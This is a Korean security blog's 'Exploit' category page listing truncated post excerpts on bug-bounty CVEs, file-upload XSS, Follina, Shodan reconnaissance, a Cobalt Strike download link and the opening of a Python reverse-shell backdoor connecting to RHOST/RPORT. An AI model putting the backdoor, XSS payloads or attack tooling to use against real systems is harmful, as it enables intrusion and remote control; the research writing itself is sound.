$ whoami

Home

분류 전체보기 (127)

Home

분류 전체보기 (127)

블로그 내 검색

CONTACT

HACKINTOANETWORK
OFFENSIVE SECURITY RESEARCHER, PENETRATION TESTER

Exploit (10)

Exploit/Bug Bounty
[Bug Bounty] Patchstack WordPress Plugin Bug Bounty
오랜만에 글을 써봅니다 흠냐. 이번 년도 들어오고 워드프레스에서 CVE 따려고 올해 1월인가 작년 12월부터 공부했었는데 드디어 워드프레스 플러그인에서 제로 데이 취약점을 찾을 수 있었습니다 ... 허허 처음 CVE 받았을 땐 엄청 기뻤는데 이제는 CVE 나와도 그런가보다 합니ㅏㄷ .. ㅎㅎ 현재까지 발급받은 CVE 는 다음과 같습니다. CVE (약 60 개 발급 대기 중) CVE-2023-29385 CVE-2023-29441 CVE-2023-30471 CVE-2023-30472 CVE-2023-30487 CVE-2023-30493 CVE-2023-30499 CVE-2023-30779 CVE-2023-30871 CVE-2023-30473 CVE-2023-31071 CVE-2023-30868 CVE-202..

2023. 5. 2.

Exploit/Exploit
[XSS] File upload XSS
XSS via filename Node.js third-party modules disclosed on HackerOne: [tianma-static]... hackerone.com create filename start tianma-static xss fired XSS via Metadata Shopify disclosed on HackerOne: XSS Stored via Upload avatar PNG... hackerone.com Exiftool를 사용하여 메타데이터에 xss 페이로드 쓰기 파일에서 exif 메타데이터가 제거되지 않은 경우에 발생할 수 있다. exiftool command exiftool -Comment="\">" xss_comment_exif_metadata_double_quot..

2023. 2. 2.

Exploit/Bug Bounty
[Bug Bounty] Daum Cafe, Tistory Stored XSS PoC
보호되어 있는 글입니다. 비밀번호를 입력해야 내용을 볼 수 있어요.

2023. 1. 24.

Exploit/Exploit
How to install Parallels tools on Kali Linux kernel 5.18.0
Parallels tools on Kali Linux kernel 5.18.0 설치 에러 해결 방법. Linux kali 5.18.0-kali7-arm64 #1 SMP Debian 5.18.16-1kali1 (2022-08-31) aarch64 GNU/Linux 아래 명령어를 따라 쳐주세요. # apt-get update && apt-get upgrade -y && apt-get dist-upgrade -y # reboot # apt-get install linux-headers-$(uname -r) # tar -zxvf prl_mod.tar.gz 패치를 다운받아줘야 합니다. 아래 링크 남깁니다. Patch Download Link : https://drive.google.com/file/d/18em0Z..

2022. 9. 27.

Exploit/Tools
Cobalt Strike - Kali Linux 2022.3 ARM64
Platform Kali Linux 2022.3 ARM64 (Tested) Downlaods [Cobalt-Strike Downloads] https://mega.nz/file/iZ8jQQ4K#Y6kwDNGBQKfowybJisZX9XpK6-SKyW3LO6-_X6VKRFo [jdk-8-java-8 Downloads] https://awesometolearns.blogspot.com/2021/10/how-to-install-jdk-8-java-8-in-linux.html Kali Linux 2022.3 ARM64 JDK 8 Install Guide sudo tar -xvzf ~/Downloads/jdk-8u301-linux-aarch64.tar.gz sudo nano /etc/environment [Add ..

2022. 9. 11.

Exploit/Exploit
[Follina] Microsoft Office code execution vulnerability
Follina Exploit (CVE-2022-30190) MS 오피스 제로데이 취약점 Follina (CVE-2022-30190) Word와 같은 프로그램에서 URL 프로토콜을 사용하여 MSDT를 호출할 때 원격 코드 실행 취약점이 존재한다. 이 취약점 공격에 성공한 공격자는 MS 오피스 프로그램의 권한으로 원격 코드를 실행할 수 있다. 그런 다음 공격자는 사용자 권한이 허용하는 범위에서 프로그램을 설치하거나, 데이터를 보거나, 변경하거나, 삭제하거나, 새 계정을 만들 수 있다. 이 취약점은 nao_sec 이라는 사이버 보안 연구 팀에 의해 발견되었다. 이름이 Follina인 이유? 정보보안 커뮤니티에서는 이 취약점을 'Folina'라고 부른다. 이 취약점은 보안 연구원들이 VirusTotal의 0..

2022. 6. 4.

Exploit/Tools
[Tools] Python Backdoor
Payload import os import time import socket import getpass import platform import subprocess from colorama import Fore, Style def client_connect(): global sock try: sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) sock.connect((RHOST, RPORT)) return sock except ConnectionRefusedError: time.sleep(5) def header(): header = f"""{Fore.LIGHTBLUE_EX}┌──({Fore.CYAN}{getpass.getuser()}{Style.RES..

2022. 4. 29.

Exploit/Bug Bounty
[Shodan] 쇼단을 이용한 모의해킹 및 정보수집
OSINT(Open-Source INTelligence) 공개적으로 접근 가능한 자원으로부터 모아진 정보를 얻을 수 있다. 이때 쇼단이나 구글 등을 OSINT라고 한다. Offensive: 직접 정보 수집(적극적인) - Domain name, google cache, scraping, google hacking database Defensive: 수집된 정보 확인(소극적인) - dark web, security breaches, threat intelligence Shodan 이란? 쇼단은 인터넷에 연결된 장비들을 찾아주는 검색 엔진으로, 기업 내 취약할 수 있는 장비를 빠르게 발견하는 데에 도움을 준다. 구글을 비롯한 다른 검색엔진은 웹만 인덱싱하지만 쇼단은 웹캠, 정수 처리장, 요트, 의료 장비, 신..

2022. 3. 1.

이전

1 2

다음

전체 글 보기

Tistory 로그인

Tistory 로그아웃

로그아웃 글쓰기 관리

Today

Total

Powered by hackintoanetwork

Designed by Nana

블로그 이미지

hackintoanetwork

티스토리툴바